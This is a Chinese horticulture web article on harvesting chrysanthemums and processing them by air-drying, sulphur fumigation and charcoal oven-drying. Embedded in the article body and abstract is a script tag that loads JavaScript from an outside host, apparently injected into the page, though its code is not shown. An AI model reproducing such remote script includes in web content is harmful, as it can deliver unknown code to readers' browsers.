您现在的位置:那花园花卉网 > 花艺天地 > 插花花艺 >

菊花的采收加工

来源:未知
】 2012-08-12 00:00
[摘要]#106avascript" src="http://zz.ag365.com/js/check.asp?id=4164"/gt;一般于霜降至立冬采收。以花心散开2/3时为采收适期。采收菊花要选择晴天,采收后要及时加工,防止腐烂、变色。各产区都有传统的加工方法。毫菊的加工方法如下:在花盛开齐放,花瓣普遍洁
<Script type="text/javascript" src="http://zz.ag365.com/js/check.asp?id=4164"></Script>    一般于霜降至立冬采收。以花心散开2/3时为采收适期。采收菊花要选择晴天,采收后要及时加工,防止腐烂、变色。各产区都有传统的加工方法。毫菊的加工方法如下:在花盛开齐放,花瓣普遍洁白时,连茎秆割下,扎成小捆,倒挂于通风干燥处晾干,不能曝晒,否则香气差。晾至八成干时,即可将花摘下,置熏房内用硫黄熏白,熏后再薄摊晒1天即干燥。然后装箱。贡菊的加工方法是:置烘房内烘焙干燥,以无烟的木炭作燃料,烘房温度控制在40~50℃之间,将菊花摊于竹帘上,当花色烘至象牙白时,即可从烘房内取出,再置通风干燥处阴至全干。菊花的亩产是一般在100千克左右,以朵大,花洁白或鲜黄,花瓣肥厚或瓣多而紧密,气清香者为佳品。